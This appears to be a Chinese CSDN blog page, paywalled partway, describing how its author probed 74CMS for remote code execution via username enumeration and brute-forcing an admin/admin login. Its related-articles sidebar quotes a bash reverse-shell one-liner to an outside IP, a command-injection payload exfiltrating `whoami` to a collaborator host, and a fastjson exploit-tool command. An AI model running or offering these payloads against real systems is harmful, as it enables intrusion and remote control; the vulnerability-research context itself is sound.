74CMS的RCE挖掘思路

最新推荐文章于 2024-04-15 20:47:11 发布
最新推荐文章于 2024-04-15 20:47:11 发布
阅读量2.7k 收藏 6
点赞数 1
分类专栏: 代码审计 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/include_voidmain/article/details/123993105
版权

0x01 前言

在漏洞挖掘时发现了一个RCE漏洞,这个漏洞的发掘,利用过程比较有趣,和大家分享一下~

实际上在半个月前,本人发布了一篇关于DedeCMS前端RCE分析并扩展RCE挖掘思路的文章。这篇文章中DedeCMS这个前端RCE出现的问题在于,浏览器发送至服务器数据包中的referer并没有进行过滤,并且将referer中的内容写入cache,然后include包含至当前文件,造成了代码注入,实现了RCE。在这里,执行并没有用eval,shell_exec,exec之类的危险函数,而是在于include。

思路是referer的内容可以注入的可执行的php文件中。在这个思路下,我就在想能不能也挖掘一个RCE出来,于是有了今天这篇文章。

注:如果想直接了解RCE过程可以直接从4.1开始。

0X01 初探74CMS

进入网站第一眼就看见了登录处。尝试SQL注入后无果,但是这里存在一个遍历用户名的问题:

图片

这个问题就可以想到,他的后台是否也存在变量用户名的问题,访问后台发现确实如此…….

图片

图片

在未设定登陆尝试的次数下可以和轻易的爆破出用户名和密码。

在简单爆破后,就发现了后台的账号密码:

admin/admin

登录后台。

图片

图片

0x02 后台漏洞挖掘

在后台,发现了一处配置网站标题,公司电话的位置,一般这些内容由于需要在前端显

最低0.47元/天 解锁文章
长白山攻防实验室
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms漏洞寻找
wanderdjjs的博客
03-04 310
这也就意味着该靶场存在xss漏洞,显示结果说明是过滤了 测试是否能显示网站cookie值。2.打开浏览器,在界面输入:IP/74cms/upload/install。1.安装完小皮之后,打开根目录,将74cms文件拖进根目录。注册结束之后进入靶场内部,我们可以选择前端和后端。这里我们选择后端,输入之前的用户名密码 进入。# 仅仅是娱乐所写,文章不够严谨,请勿见怪。1.在个人区域界面,点击搜索区域。会显示本机的IP地址和token值。3.正常我们输入是没有反馈的。这也就意味着存在文件包含漏洞。
74cms3.5.1 代码审计
weixin_45501486的博客
08-24 54
先看一下目录 index文件是一个程序的入口文件,所以通常我们只要读一遍index文件就可以大致了解整个程序的架构、运行的流程、包含到的文件, 其中核心的文件又有哪些。 而不同目录的index文件也有不同的实现方式,建议最好先将几个核心目录的index文件都简单读一遍。 从入口文件index.php开始看吧,涉及到Smarty缓存机制 <?php if(!file_exists(di...
Web安全 EmpireCMS漏洞常见漏洞分析及复现,2024年最新三幅图给你弄懂EventBus核心原理
最新发布
qq194582923的博客
04-15 1088
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
74CMS_v5.0.1后台RCE分析1
08-03
I函数简介获取变量如果要获取的变量类型是 get、post 或 put,可以统一用 param 变量类型,param 变量类型是框架特有的支持自动判断当前请求类
RCE远程命令执行漏洞挖掘思路
gududeajun的博客
09-01 3366
RCE漏洞存在的地方包括:在url参数上,文件下载处,在查看图片,查看文件等地方在文件删除上,SSRF可能存在的地方,变量参数提交的地方等
记一次曲折的RCE挖掘过程
一个安全研究员
09-10 1413
????
黑盒挖掘rce思路
goddemon
11-11 687
黑盒常见的几个点 1.文件上传 filename处这些 2.邮箱 3.存在域名的地方 典型使用的payload path拼接 1.常规拼接思路 | ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net | 2.直接反弹shell方法,编码的反弹shell思路 | bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 | tes.txt || echo YmFzaCAtaS
74cms
记录笔记
04-11 470
将这个74cms的upload目录设置为网站根目录,使用目录扫描工具进行扫描,然后使用burpsuite对后台地址用户名和密码进行爆破。 外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Vz7TMzdB-1649678567118)(![https://img-blog.csdnimg.cn/fa8e0f36afe149218e3c1549728fe6f1.png)] 爆出来用户名admin 密码root ...
74cms5.0.1RCE漏洞环境源码
10-18
74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境
代码审计_PHPCMS_V9前台RCE挖掘分析1
08-03
代码审计_PHPCMS_V9前台RCE挖掘分析1
PbootCms-3.04前台RCE挖掘过程1
08-03
是借鉴了第篇章的某些思路。接着直接来看代码,先标仍然是解析 if 标签的代码块,看下三个正则相对于上个版本来说,第三条正则多了 (\([\w\s\.]+\))
74cms 4.2.3模板
07-08
74cms4.2.3模板,大家测试用,如果其他需要,可以更贴留言,共同讨论研究
74cms 二次开发文档
08-22
74cms二次开发文档,74 smarty自定义函数,模板使用方法
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
03-25
最新骑士人才系统 74cms V4.2.3 单城市商业版源码分享,含3套模板,求职招聘系统源码
Umbraco-RCE:Umbraco CMS 7.12.4-(已认证)远程执行代码
03-21
Umbraco RCE漏洞利用/ PoC Umbraco CMS 7.12.4-(已认证)远程执行代码 [ ] [ ]用法$ python exploit.py -husage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]Umbraco authenticated RCEoptional ...
RCE漏洞挖掘经验分享(一)
记录并分享学习安全的知识点..
01-21 2279
一、RCE漏洞概述 RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 产生的原因:服务器没有对执行命令的函数做严格的过滤,最终导致命令被执行。 二、命令执行函数 1.PHP代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等
e7xue.php漏洞_Laravel5.7反序列化漏洞之RCE挖掘
weixin_39821035的博客
12-21 271
在前一阵的 2019强网杯线下赛 中,出现一道 Laravel5.7 RCE 漏洞的利用。之前有关注过这个漏洞,但没细究。比赛期间,原漏洞作者删除了详细的分析文章,故想自己挖掘这个漏洞利用链。本文将详细记录 Laravel5.7 反序列化漏洞RCE链 的挖掘过程。漏洞环境直接使用 composer 安装 laravel5.7 框架,并通过 php artisan serve 命令启动 Web 服务...
《WEB安全渗透测试》(30)RCE漏洞挖掘技巧
午夜安全
09-14 1524
我们安全工程师最喜欢的漏洞是什么?非RCE漏洞莫属!那RCE漏洞挖掘是否有技巧可言?
fastjson rce
09-16
Fastjson RCE(Remote Code Execution)是指在使用Fastjson这个Java库时,存在远程代码执行的风险。在Fastjson版本1.2.24及以下的版本中,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的考虑不够周全,导致攻击者可以通过构造恶意的JSON数据来执行任意的Java代码,从而实现远程代码执行。 为了利用Fastjson RCE问题,攻击者可以使用一些工具,比如fastjson_tool.jar。通过执行类似以下命令来利用Fastjson RCE问题: ``` java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ``` 以上命令中,HRMIServer和HLDAPServer是Fastjson工具提供的两种利用方式,它们可以远程执行指定的代码,包括通过curl命令发送HTTP请求。 值得注意的是,Fastjson RCE问题只存在于版本1.2.24及以下,因此建议使用最新版本的Fastjson以避免此安全风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值